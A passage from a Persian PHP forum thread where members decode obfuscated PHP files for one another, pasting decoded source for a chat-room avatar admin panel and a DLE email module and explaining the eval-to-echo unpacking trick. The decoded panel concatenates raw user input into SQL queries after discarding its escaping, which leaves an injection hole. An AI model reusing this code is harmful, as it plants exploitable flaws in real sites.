    elseif ( $pr == "6" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "7" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "8" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "9" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }
    elseif ( $pr == "10" ) {
    $pr2 = "images/$s/pr$pr.gif";
    }else {
    $pr2 = "images/pr.gif";
    }
    $tc_r = $tc_g = $tc_b = 0;
    $image = ImageCreateFromGIF($pr2);
    $text_color = ImageColorAllocate($image, $tc_r, $tc_g, $tc_b);
    Header("Content-type: image/GIF");
    ImageString ($image, 5, 5, 2, $code, $text_color);
    ImageGIF($image, '', 75);
    ImageDestroy($image);
    }
    ?>

  30. #30

    نقل قول: دیکد پی اچ پی

    اگه میشه آموزش این دیکد کردنو بدین من اون آموزشی که بالا دیدینو دیدم و انجام دادم عملی انجام نشد لطفا اگه میشه یک آموزش جامع بزارید اگرم میشه این کد رو دیکد کنین. با تشکر
    http://www.uploadtak.com/images/l4725_admin.zip

  31. #31

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط Mdxd-Mdxd مشاهده تاپیک
    اگه میشه آموزش این دیکد کردنو بدین من اون آموزشی که بالا دیدینو دیدم و انجام دادم عملی انجام نشد لطفا اگه میشه یک آموزش جامع بزارید اگرم میشه این کد رو دیکد کنین. با تشکر
    http://www.uploadtak.com/images/l4725_admin.zip
    سلام دیکد شد اما کار یه گروه ایرانی هست فکر نمیکنم درست باشه دیکد کردنش به هر حال این فایل شماست

    <?php
    <html><head><style><style type="text/css">body
    {
    background-color: #FFFFFF;
    color: #000000;
    }
    p, span, div, ol, ul, li, td, button, input, textarea, form
    {
    margin: 0;
    padding: 0;
    }
    a
    {
    color: #C8D7EB;
    outline: none;
    text-decoration: underline;
    }
    a:visited
    {
    color: #C8D7EB;
    }
    a:active
    {
    color: #C8D7EB;
    }
    a:hover
    {
    color: #376BAD;
    text-decoration: underline;
    }
    </style><style type="text/css">#Image1
    {
    border: 0px #000000 solid;
    }
    body
    {
    font-family:tahoma;
    color:#fff;
    font-size:8pt;
    background-image:url(img/bggg.png);
    }
    td:hover
    {
    background-color:#FFC;
    }
    td
    {
    font-family:tahoma;
    font-size:8pt;
    border:1px solid #333;
    padding:4px;
    width:80px;
    -moz-border-radius:8px;
    -webkit-border-radius:8px;
    border-radius:8px;
    text-align:center;
    height:30px;
    color:#006699;
    background-color:#FFFFFF;
    direction:rtl;
    margin:5px;
    box-shadow:0 0 6px #000;
    width:120px;
    }
    </style><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;
    charset=utf-8" /><style type="text/css">#ser
    {
    width:200px;
    height:30px;
    -moz-border-radius:8px;
    moz-border-radius:8px;
    -border-radius:8px;
    border-radius:8px;
    }
    #pag
    {
    width:80px;
    height:30px;
    -moz-border-radius:8px;
    moz-border-radius:8px;
    -border-radius:8px;
    border-radius:8px;
    }
    #ser:hover
    {
    box-shadow:0px 0px 10px 1px #09F;
    }
    #sub
    {
    font-family:b yekan;
    font-size:12px;
    color:white;
    height:30px;
    -moz-border-radius:8px;
    moz-border-radius:8px;
    -border-radius:8px;
    border-radius:8px;
    background:-webkit-gradient(linear,left top,left bottom,color-stop(0%,#00a2ff), color-stop(100%,#0069a5));
    filter:progid:DXImageTransform.Microsoft.gradient( startColorstr="#00a2ff",endColorstr="#0069a5",Grad ientType=0);
    background:-ms-linear-gradient(#00a2ff,#0069a5);
    background:-moz-linear-gradient(#00a2ff,#0069a5);
    background:-o-linear-gradient(#00a2ff,#0069a5);
    }
    </style><html><head><meta content="text/html;
    charset=utf-8" http-equiv="Content-Type" /></head><body></div></div><div align="center"><head><style type="text/css">.auto-style1
    {
    font-family: Tahoma;
    font-size: x-small;
    }
    te
    {
    background:#C9F;
    }
    </style></head><tr><meta content="text/html;
    charset=utf-8" http-equiv="Content-Type" /><center><br /><br /><br /><br><table> echo "<head><style type=\"text/css\">.auto-style1 {tfont-family: Tahoma;tfont-size: x-small;}</style></head><form action=\"\" method=\"POST\"><input id=\"ser\" type=\"text\" name=\"q\"> <input id=\"sub\" type=\"submit\" value=\"جستجو \" name=\"Get\"></form>";
    $GLOBALS['_POST'][page] = $_POST[page] ? $_POST[page] : 1;
    $limit = ( $_POST[page] - 1 ) * 50;
    echo "<meta content=\"text/html; charset=utf-8\" http-equiv=\"Content-Type\" /><meta content=\"سيستم امتياز دهي چت روم - طراحي حسین \" name=\"description\"><title>پنل آواتار چت روم</title><style>nbody{font-family:tahoma;font-size:8pt;}ntd{font-family:tahoma;font-size:8pt;border:1px solid #ffc060padding:5px;width:100px;text-align:center;height:30px;color:#FFFFFF;background-color:#000000;-moz-border-radius:6px;-webkit-border-radius:6px;direction:rtl;-moz-box-shadow:3px 3px 4px #ffc060;margin:5px;-webkit-box-shadow:3px 3px 4px #FFFFFF;}</style>";
    include( "db.php" );
    mysql_connect( "localhost", $sqluser, $sqlpass );
    mysql_select_db( $database );
    $Q = mysql_query( "SELECT COUNT(*) as count FROM `db1_etchat_user` where db1_etchat_user.etchat_userprivilegien!='gast'" );
    $C = mysql_fetch_array( $Q );
    $Count_ = $C['count'];
    if ( isset( $_POST[q] ) )
    {
    $GLOBALS['_POST'][q] = mysql_real_escape_string( $_POST[q] );
    $GLOBALS['_POST'][q] = $_POST[q];
    $search = TRUE;
    $Q = mysql_query( "SELECT db1_etchat_user.etchat_username as username, etchat_user_id as useron, etchat_reg_timestamp as usertime, etchat_usersex as usersex, etchat_userprivilegien as userpriv, emtiyaz as emtiyaz FROM `db1_etchat_user` where db1_etchat_user.etchat_userprivilegien!='gast' AND db1_etchat_user.etchat_userprivilegien!='system' AND db1_etchat_user.etchat_username LIKE '%".$_POST[q]."%' ORDER BY db1_etchat_user.emtiyaz DESC LIMIT
    {
    $limit
    }
    ,50" );
    }
    else
    {
    $Q = mysql_query( "SELECT db1_etchat_user.etchat_username as username, etchat_user_id as useron, etchat_reg_timestamp as usertime, etchat_usersex as usersex, etchat_userprivilegien as userpriv, emtiyaz as emtiyaz FROM `db1_etchat_user` where db1_etchat_user.etchat_userprivilegien!='gast' AND db1_etchat_user.etchat_userprivilegien!='system' ORDER BY db1_etchat_user.emtiyaz DESC LIMIT ".$limit.",50 " );
    }
    if (isset($_POST['page']))
    {
    echo "<font color=\"#000000;\">صفحه ";
    echo $_POST['page'];
    echo "</font>";
    }
    echo "</p></strong><br><table><tr><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">ردیف</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">حذف آواتار</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">آواتار</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">کد کاربری</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">درجه کاربری</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">نام کاربری</td></tr>";
    while ( $SS = mysql_fetch_assoc( $Q ))
    {
    $DD[] = $SS;
    }
    foreach ( $DD as $row )
    {
    ++$i;
    $new_time = round( $row['emtiyaz'] / 1 );
    $sc = $new_time / 1;
    if ( $search )
    {
    $T = mysql_query( "SELECT COUNT(*) as count FROM `db1_etchat_user` WHERE `emtiyaz`>".$row['emtiyaz']." LIMIT 1" );
    $RRR = mysql_fetch_array( $T );
    $RANK = $RRR['count'] + 1;
    }
    else
    {
    if (isset($_POST['page']))
    {
    $p = $_POST['page'];
    }
    $RANK = $i+(($p-1)*50);
    }
    if ($row['userpriv'] == user)
    {
    $picsp = "<img src=\"../../images/user.png\"/>";
    }
    if ($row['userpriv'] == user2)
    {
    $picsp = "<img src=\"../../images/vijeh.png\"/>";
    }
    if ($row['userpriv'] == user3)
    {
    $picsp = "<img src=\"../../images/active.png\"/>";
    }
    if ($row['userpriv'] == user4)
    {
    $picsp = "<img src=\"../../images/arshad.png\"/>";
    }
    if ($row['userpriv'] == sarparast)
    {
    $picsp = "<img src=\"../../images/parast_i.png\"/>";
    }
    if ($row['userpriv'] == parast)
    {
    $picsp = "<img src=\"../../images/parast_i.png\"/>";
    }
    if ($row['userpriv'] == mod)
    {
    $picsp = "<img src=\"../../images/mod.png\"/>";
    }
    if ($row['userpriv'] == modir)
    {
    $picsp = "<img src=\"../../images/mod.png\"/>";
    }
    if ($row['userpriv'] == gast)
    {
    $picsp = "<img src=\"../../images/gast.png\"/>";
    }
    if ($row['userpriv'] == admin)
    {
    $picsp = "<img src=\"../../images/admin_i.png\"/>";
    }
    $trimmed = $row['useron'];
    $Query = "select * from `db1_etchat_useronline` where etchat_onlineuser_fid like \"$trimmed\" order by etchat_onlineuser_fid";
    $numresults=mysql_query($Query);
    $numrows=mysql_num_rows($numresults);
    if ($numrows == 0)
    {
    $onlogo = "<img align=\"left\" src=\"img/offline.png\"/>";
    }
    else
    {
    $onlogo = "<img align=\"left\" title=\" در حال چت کردن \" alt=\" در حال چت کردن \" src=\"img/online.png\"/>";
    }
    echo "<tr> <td id=\"down\" >".$i."</td> <td id=\"down\" ><a href=\"../../?AdminDeleteAV&id=2&pic=avatars/".$row['useron'].".jpg\">حذف</a></td> <td id=\"down\" ><img src=\"../../avatars/".$row['useron'].".jpg\" height=\"70\" onerror=\"this.src='../../avatars/def.png'\" width=\"\"/></td><td id=\"down\" >".$row['useron']."</td> <td id=\"down\" >".$picsp."</td> <td id=\"down\" >".$row['username']."</td> </tr>";
    }
    echo "</table><br><br><br><br><form action=\"\" method=\"POST\"><select id=\"pag\" name=\"page\">";
    $i = 0;
    for ( ;$i < ceil( $Count_ / 50 );++$i )
    {
    $n = $i + 1;
    if ($n == $_POST['page'])
    {
    $thi = "selected=\"selected\" ";
    }
    else
    {
    $thi = "";
    }
    echo "<option$thivalue=\"".$n."\">".$n."</option>";
    }
    echo "</select><input id=\"sub\" type=\"submit\" value=\"برو به صفحه\" name=\"gopage\"></form><p><font face=\"Tahoma\" size=\"2\">&nbsp;</font></p>
    <p><font color=\"#FFF\"></font></td></tr></table><p>&nbsp;</p><a style=\"text-decoration:none;color:#FF9933\" href=\" \"><b></a></center>";
    <center><a href="http://1000tarh.ir" target="_blank" style="font-family:b yekan;
    font-size:14px;
    text-decoration:none;
    color:000000;
    text-shadow:0px 0px 1px #02AFFF">طراحی شده توسط تیم طراحی 1000 طرح</a></center><br /><center><a href="http://1000tarh.net" target="_blank" style="font-family:b yekan;
    font-size:14px;
    text-decoration:none;
    color:000000;
    text-shadow:0px 0px 1px #02AFFF">هاستینگ 1000 طرح</a></center></body></html></center></body>
    ?>

  32. #32

    نقل قول: دیکد پی اچ پی

    مرسی داداش ممنون اگه میشه یک بار دیگه دیکد کن چون اینا کار نمی کنه احتمال میدم اشتب دیکد شده باشه اگه زحمتی نیست یک بار دیگه دیکد کن ممنون. !!!!! بازم شرمنده

  33. #33
    کاربر تازه وارد
    تاریخ عضویت
    مهر 1391
    محل زندگی
    Shirvan
    پست
    73

    نقل قول: دیکد پی اچ پی

    سلام دوستان
    آموزش طریقه دیکد کردن یک فایل php رو در قالب یک فیلم براتون آماده کرده ام در ضمن وقتی فایلتان را در مرورگر باز می کنید حتما باید از یک سرور مجازی همانند wamp یا Xampp استفاده کنید.ابتدا هر سه قسمت رو دانلود کنید و سپس هر سه فایل رو در یک مکان بر روی کامپیوترتان از حالت فشرده خارج کنید.

    قسمت اول

    قسمت دوم

    قسمت سوم

    تشکر یادتون نره

  34. #34

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط Mdxd-Mdxd مشاهده تاپیک
    مرسی داداش ممنون اگه میشه یک بار دیگه دیکد کن چون اینا کار نمی کنه احتمال میدم اشتب دیکد شده باشه اگه زحمتی نیست یک بار دیگه دیکد کن ممنون. !!!!! بازم شرمنده
    سلام دقیقا بگو کجا و چه لاینی مشکل داره
    چون من قبلا هم گفتم ممکنه مشکل داشته باشه که باید با علم برنامه نویسی خودتون کاملش کنید

  35. #35
    کاربر تازه وارد
    تاریخ عضویت
    مهر 1391
    محل زندگی
    Shirvan
    پست
    73

    نقل قول: دیکد پی اچ پی

    سلام
    برای دیکد کردن شما ابتدا باید فایلتون رو داخل یک نرم افزار ویرایش فایل همانند notepad باز کنید . و در داخل فایلتان به دنبال آخرین eval بگردید پس از آنکه آن را پیدا کردید آنرا با واژه echo جایگزین کنید.
    ضمیمه 109203
    پس از این کار آنرا دخیره کنید و در مرورگرتان آنرا باز کنید در ضمن شما باید از یک سرور مجازی همانند wamp یا Xampp استفاده کنید.
    ضمیمه 109204
    همانند تصویر بالا تمام کد موجود بر روی صفحه مرورگر را کپی کنید.
    ضمیمه 109205
    باز همانند تصویر بالا از echo که آنرا در داخل فایلتان وارد کرده بودید را انتخاب کنید و حذف کنید و کدهای را که کپی کرده بودید آنجا pase کنید.
    ضمیمه 109206
    و همانند قسمت اول آخرین eval را با echo جایگرین کنید و فایل را ذخیره و در مرورگرتان باز کنید و کزینه source رو انتخاب کنید فایل شما دیکد شده است .
    تشکر یادتون نره

  36. #36
    کاربر تازه وارد
    تاریخ عضویت
    اردیبهشت 1385
    پست
    62

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط Mdxd-Mdxd مشاهده تاپیک
    مرسی داداش ممنون اگه میشه یک بار دیگه دیکد کن چون اینا کار نمی کنه احتمال میدم اشتب دیکد شده باشه اگه زحمتی نیست یک بار دیگه دیکد کن ممنون. !!!!! بازم شرمنده
    این را تست کنید
    <html><head><style><style type="text/css">body{   background-color: #FFFFFF;   color: #000000;}p, span, div, ol, ul, li, td, button, input, textarea, form{   margin: 0;   padding: 0;}a{   color: #C8D7EB;   outline: none;   text-decoration: underline;}a:visited{   color: #C8D7EB;}a:active{   color: #C8D7EB;}a:hover{   color: #376BAD;   text-decoration: underline;}</style><style type="text/css">#Image1{   border: 0px #000000 solid;}body{font-family:tahoma;color:#fff;font-size:8pt;background-image:url(img/bggg.png);}td:hover{background-color:#FFC;}td{font-family:tahoma;font-size:8pt;border:1px solid #333;padding:4px;width:80px;-moz-border-radius:8px;-webkit-border-radius:8px;border-radius:8px;text-align:center;height:30px;color:#006699;background-color:#FFFFFF;direction:rtl;margin:5px;box-shadow:0 0 6px #000;width:120px;}</style><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">#ser{width:200px;height:30px;-moz-border-radius:8px;moz-border-radius:8px;-border-radius:8px;border-radius:8px;}#pag{width:80px;height:30px;-moz-border-radius:8px;moz-border-radius:8px;-border-radius:8px;border-radius:8px;}#ser:hover{box-shadow:0px 0px 10px 1px #09F;}#sub{font-family:b yekan;font-size:12px;color:white;height:30px;-moz-border-radius:8px;moz-border-radius:8px;-border-radius:8px;border-radius:8px;background:-webkit-gradient(linear,left top,left bottom,color-stop(0%,#00a2ff), color-stop(100%,#0069a5));filter:progid:DXImageTransform  .Microsoft.gradient(startColorstr="#00a2ff",endCol  orstr="#0069a5",GradientType=0);background:-ms-linear-gradient(#00a2ff,#0069a5);background:-moz-linear-gradient(#00a2ff,#0069a5);background:-o-linear-gradient(#00a2ff,#0069a5);}</style><html><head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /></head><body></div></div><div align="center"><head><style type="text/css">.auto-style1 {font-family: Tahoma;font-size: x-small;}te{background:#C9F;}</style></head><tr><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><center><br /><br /><br /><br><table><?php  echo "<head><style type=\"text/css\">.auto-style1 {tfont-family: Tahoma;tfont-size: x-small;}</style></head><form action=\"\" method=\"POST\"><input id=\"ser\" type=\"text\" name=\"q\"> <input id=\"sub\" type=\"submit\" value=\"جستجو \" name=\"Get\"></form>"; $GLOBALS['_POST'][page] = $_POST[page] ? $_POST[page] : 1; $limit = ( $_POST[page] - 1 ) * 50; echo "<meta content=\"text/html; charset=utf-8\" http-equiv=\"Content-Type\" /><meta content=\"سيستم امتياز دهي چت روم - طراحي حسین \" name=\"description\"><title>پنل آواتار چت روم</title><style>nbody{font-family:tahoma;font-size:8pt;}ntd{font-family:tahoma;font-size:8pt;border:1px solid #ffc060padding:5px;width:100px;text-align:center;height:30px;color:#FFFFFF;background-color:#000000;-moz-border-radius:6px;-webkit-border-radius:6px;direction:rtl;-moz-box-shadow:3px 3px 4px #ffc060;margin:5px;-webkit-box-shadow:3px 3px 4px #FFFFFF;}</style>"; include( "db.php" ); mysql_connect( "localhost", $sqluser, $sqlpass ); mysql_select_db( $database ); $Q = mysql_query( "SELECT COUNT(*)  as count FROM `db1_etchat_user` where db1_etchat_user.etchat_userprivilegien!='gast'" ); $C = mysql_fetch_array( $Q ); $Count_ = $C['count']; if ( isset( $_POST[q] ) ) { $GLOBALS['_POST'][q] = mysql_real_escape_string( $_POST[q] ); $GLOBALS['_POST'][q] = $_POST[q]; $search = TRUE; $Q = mysql_query( "SELECT db1_etchat_user.etchat_username as username, etchat_user_id as useron, etchat_reg_timestamp as usertime, etchat_usersex as usersex, etchat_userprivilegien as userpriv, emtiyaz as emtiyaz FROM `db1_etchat_user` where db1_etchat_user.etchat_userprivilegien!='gast' AND db1_etchat_user.etchat_userprivilegien!='system' AND db1_etchat_user.etchat_username LIKE '%".$_POST[q]."%' ORDER BY db1_etchat_user.emtiyaz DESC LIMIT {$limit},50\t" ); } else { $Q = mysql_query( "SELECT db1_etchat_user.etchat_username as username, etchat_user_id as useron, etchat_reg_timestamp as usertime, etchat_usersex as usersex, etchat_userprivilegien as userpriv, emtiyaz as emtiyaz FROM `db1_etchat_user` where db1_etchat_user.etchat_userprivilegien!='gast' AND db1_etchat_user.etchat_userprivilegien!='system' ORDER BY db1_etchat_user.emtiyaz DESC LIMIT ".$limit.",50\t" ); } if (isset($_POST['page'])) { echo "<font color=\"#000000;\">صفحه "; echo $_POST['page']; echo "</font>"; } echo "</p></strong><br><table><tr><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">ردیف</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">حذف آواتار</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">آواتار</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">کد کاربری</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">درجه کاربری</td><td style=\"background-image:url(../../img/back.png);font-family:b yekan;color:#02AFF0;font-weight:bold\">نام کاربری</td></tr>"; while ( $SS = mysql_fetch_assoc( $Q )) { $DD[] = $SS; } foreach ( $DD as $row ) { ++$i; $new_time = round( $row['emtiyaz'] / 1 ); $sc = $new_time / 1; if ( $search ) { $T = mysql_query( "SELECT COUNT(*) as count FROM `db1_etchat_user` WHERE `emtiyaz`>".$row['emtiyaz']." LIMIT 1" ); $RRR = mysql_fetch_array( $T ); $RANK = $RRR['count'] + 1; } else { if (isset($_POST['page'])) { $p = $_POST['page']; } $RANK = $i+(($p-1)*50); } if ($row['userpriv'] == user) { $picsp = "<img src=\"../../images/user.png\"/>"; } if ($row['userpriv'] == user2) { $picsp = "<img src=\"../../images/vijeh.png\"/>"; } if ($row['userpriv'] == user3) { $picsp = "<img src=\"../../images/active.png\"/>"; } if ($row['userpriv'] == user4) { $picsp = "<img src=\"../../images/arshad.png\"/>"; } if ($row['userpriv'] == sarparast) { $picsp = "<img src=\"../../images/parast_i.png\"/>"; } if ($row['userpriv'] == parast) { $picsp = "<img src=\"../../images/parast_i.png\"/>"; } if ($row['userpriv'] == mod) { $picsp = "<img src=\"../../images/mod.png\"/>"; } if ($row['userpriv'] == modir) { $picsp = "<img src=\"../../images/mod.png\"/>"; } if ($row['userpriv'] == gast) { $picsp = "<img src=\"../../images/gast.png\"/>"; } if ($row['userpriv'] == admin) { $picsp = "<img src=\"../../images/admin_i.png\"/>"; } $trimmed = $row['useron']; $Query = "select * from `db1_etchat_useronline` where etchat_onlineuser_fid like \"$trimmed\"    order by etchat_onlineuser_fid"; $numresults=mysql_query($Query); $numrows=mysql_num_rows($numresults); if ($numrows == 0) { $onlogo = "<img align=\"left\" src=\"img/offline.png\"/>"; } else { $onlogo = "<img align=\"left\" title=\" در حال چت کردن \" alt=\"  در حال چت کردن  \" src=\"img/online.png\"/>"; } echo "<tr> <td id=\"down\" >".$i."</td>    <td id=\"down\" ><a href=\"../../?AdminDeleteAV&id=2&pic=avatars/".$row['useron'].".jpg\">حذف</a></td>    <td id=\"down\" ><img src=\"../../avatars/".$row['useron'].".jpg\" height=\"70\" onerror=\"this.src='../../avatars/def.png'\" width=\"\"/></td><td id=\"down\" >".$row['useron']."</td>        <td id=\"down\" >".$picsp."</td>     <td id=\"down\" >".$row['username']."</td>    </tr>"; } echo "</table><br><br><br><br><form action=\"\" method=\"POST\"><select id=\"pag\" name=\"page\">"; $i = 0; for ( ; $i < ceil( $Count_ / 50 ); ++$i ) { $n = $i + 1; if ($n == $_POST['page']) { $thi = "selected=\"selected\" "; } else { $thi = ""; } echo "<option $thi value=\"".$n."\">".$n."</option>"; } echo "</select><input id=\"sub\" type=\"submit\" value=\"برو به صفحه\" name=\"gopage\"></form><p><font face=\"Tahoma\" size=\"2\"> </font></p>\r\n<p><font color=\"#FFF\"></font></td></tr></table><p> </p><a style=\"text-decoration:none;color:#FF9933\" href=\" \"><b></a></center>"; ?><center><a href="http://1000tarh.ir" target="_blank" style="font-family:b yekan;font-size:14px;text-decoration:none;color:000000;text-shadow:0px 0px 1px #02AFFF">طراحی شده توسط تیم طراحی 1000 طرح</a></center><br /><center><a href="http://1000tarh.net" target="_blank" style="font-family:b yekan;font-size:14px;text-decoration:none;color:000000;text-shadow:0px 0px 1px #02AFFF">هاستینگ 1000 طرح</a></center></body></html></center></body>

  37. #37

    نقل قول: دیکد پی اچ پی

    دمت گرم داداش (a_ahmadi) کاملا سالم دیکد کردی حرف نداری داداش نمی دونم چطور تشکر کنم ازت فقط یک در خواست دیگه هم ازت دارم میشه یک آموزش تصویری درست در حد کاربر معمولی برای دیکد همچین فایلا بزاری ممنون میشم داداش.
    بچه ها بالا توضیح دادن ولی من سر این راهو رفتم عملی نشد.

  38. #38

    Post نقل قول: دیکد پی اچ پی

    سلام منم یه فایل دارم
    ممنون میشم زحمتشو بکشید
    من تو فایلم echo پیدا نکردم که جا بجا کنم...
    test.zip

  39. #39

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط senator_x مشاهده تاپیک
    سلام منم یه فایل دارم
    ممنون میشم زحمتشو بکشید
    من تو فایلم echo پیدا نکردم که جا بجا کنم...
    test.zip
    موردی که باید متذکر بشم اینه که همه کاربران فکر میکنن میتونن با روش گفته شده در بالا کد رو دیکود کنند ولی اینطور نیست ما چندین مدل کدینگ داریم که روش ذکر شده فقط برای نوع خاصی از کدینگ می باشد و کدی مثل شما که با php lockit قفل شده است به روش بالا دیکود نخواهد شد

    <?php NGINE')){die('Hacking attempt!');}
    require_once ENGINE_DIR .'/classes/parse.class.php';
    $parse = new ParseFilter( );
    $newsid = intval($_GET['newsid']);
    $action = $_POST['action'];
    session_start();
    if($newsid){
    if ($action==''){
    $tpl->load_template( 'imp_news_send.tpl');
    $tpl->compile( 'content');
    $tpl->clear();
    echo $tpl->result['content'];
    }else{
    $target = intval($_POST['news_target']);
    $not_allow_symbol = array ("\x22","\x60","\t",'\n','\r',"\n","\r",'\\',', ','/','¬','#',';',':','~','[',']','{','}',')','(','*','^','%',"$",'<','>','?','!', '"',"'",' ','&');
    $xemail = $db->safesql(trim( str_replace( $not_allow_symbol,'',strip_tags( stripslashes( $_POST['news_email'] ) ) ) ) );
    if( empty( $xemail ) OR strlen( $xemail ) >50 OR @count(explode('@',$xemail)) != 2) $stop .= '<li>آدرس ایمیل معتبر نمیباشد.</li>';
    if( empty( $target ) ) $stop .= '<li>شما محتوای ایمیل را انتخاب نکرده اید.</li>';
    if ($stop){
    msgbox( 'خطا:',"<ul>{$stop}</ul><a href=\"javascript:history.go(-1)\">بازگشت</a>");
    }else{
    $row = $db->super_query ( 'SELECT id, short_story, title, date FROM '.PREFIX ."_post WHERE id ='$newsid'");
    $row['date'] = strtotime( $row['date'] );
    $ndate = jdate( 'd.m.Y',$row['date']);
    $link = $config['http_home_url'].'index.php?newsid='.$newsid;
    if(!$_POST['gname']){
    $uname = $member_id['name'];
    }else{
    $user_name = $db->safesql( $parse->process( htmlspecialchars( trim( $_POST['gname'] ),ENT_COMPAT,$config['charset'] ) ) );
    $user_name = preg_replace('#\s+#i',' ',$user_name);
    $uname = $user_name;
    }
    if ($target == '1'){
    $stor = " <div style=\"font:11px tahoma;direction:rtl;text-align:right;margin-bottom:5px;\">کاربر گرامی<br>این مطلب از طرف {$uname} در وبسایت {$config['home_title']} برای شما ارسال شده است.</div>
    <div style=\"font:11px tahoma;direction:rtl;text-align:right;\">
    <div style=\"color:#333;\">عنوان: <a style=\"color:#f90;text-shadow:0 0 3px #fdc67f;font-size: 14px;text-decoration:none;\" href=\"{$link}\" target=\"_blank\">{$row['title']}</a><br>
    <div style=\"color:#555;margin-bottom:3px;padding-top:3px;\">تاریخ انتشار: {$ndate}</div>
    <div style=\"border-bottom:3px solid #f7f7f7;\"></div><br>
    </div>
    </div>";
    }else{
    $stor = " <div style=\"font:11px tahoma;direction:rtl;text-align:right;margin-bottom:5px;\">کاربر گرامی<br>این مطلب از طرف {$uname} در وبسایت {$config['home_title']} برای شما ارسال شده است.</div>
    <div style=\"font:11px tahoma;direction:rtl;text-align:right;\">
    <div style=\"color:#333;\">عنوان: <a style=\"color:#f90;text-shadow:0 0 3px #fdc67f;font-size: 14px;text-decoration:none;\" href=\"{$link}\" target=\"_blank\">{$row['title']}</a><br>
    <div style=\"color:#555;margin-bottom:3px;padding-top:3px;\">تاریخ انتشار: {$ndate}</div>
    <div style=\"border-bottom:3px solid #f7f7f7;\"></div><br>
    {$row['short_story']}</div>
    </div>";
    }
    $subject = $config['home_title'].': '.$row['title'];
    include_once ENGINE_DIR .'/classes/mail.class.php';
    $mail = new dle_mail ($config,true);
    $mail->send ($xemail,$subject,$stor);
    msgbox( 'کاربر گرامی،',"مطلب \"{$row['title']}\" به آدرس ایمیل {$xemail} با موفقیت ارسال شد.");
    }
    }
    }else{
    $tpl->load_template( 'info.tpl');
    $tpl->set( '{error}','مطلبی یافت نشده است.');
    $tpl->set( '{title}','خطا:');
    $tpl->compile( 'content');
    $tpl->clear();
    }
    ?>
    آخرین ویرایش به وسیله mehdiv : دوشنبه 28 مرداد 1392 در 19:17 عصر

  40. #40

    نقل قول: دیکد پی اچ پی

    سلام دوستان خسته نباشید
    من تازه عضو شدم الان این پست رو هم به زور تونستم بذارم بلد نبودم
    من همه این آموزشها رو خوندم ولی نتونستم کاری بکنم
    کسی وقت داره یه فایل برای من دیکد کنه البته بصورت خصوصی
    اگه کسی از دوستان حوصله و وقتشو داشت لطفاً بگید فایل رو بدم بدجور گیر هستم

صفحه 1 از 2 12 آخرآخر

تاپیک های مشابه

  1. دیکد کردن برنامه های دات نت و محافظت از سورس
    نوشته شده توسط ara_prg در بخش C#‎‎
    پاسخ: 16
    آخرین پست: پنج شنبه 25 بهمن 1386, 02:19 صبح
  2. دیکد کردن صفحات cgi
    نوشته شده توسط yazdan در بخش دیگر زبان های اسکریپتی
    پاسخ: 0
    آخرین پست: جمعه 15 آبان 1383, 20:46 عصر
  3. دیکد کردن cgi
    نوشته شده توسط yazdan در بخش PHP
    پاسخ: 0
    آخرین پست: چهارشنبه 06 آبان 1383, 06:51 صبح
  4. دیکد کردن base64
    نوشته شده توسط مهدی فهمیده غلامی در بخش C#‎‎
    پاسخ: 1
    آخرین پست: دوشنبه 05 مرداد 1383, 17:01 عصر
  5. باز کردن و دیکد کردن فایل HEX
    نوشته شده توسط masoode در بخش برنامه نویسی در Delphi
    پاسخ: 5
    آخرین پست: یک شنبه 02 آذر 1382, 14:59 عصر

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •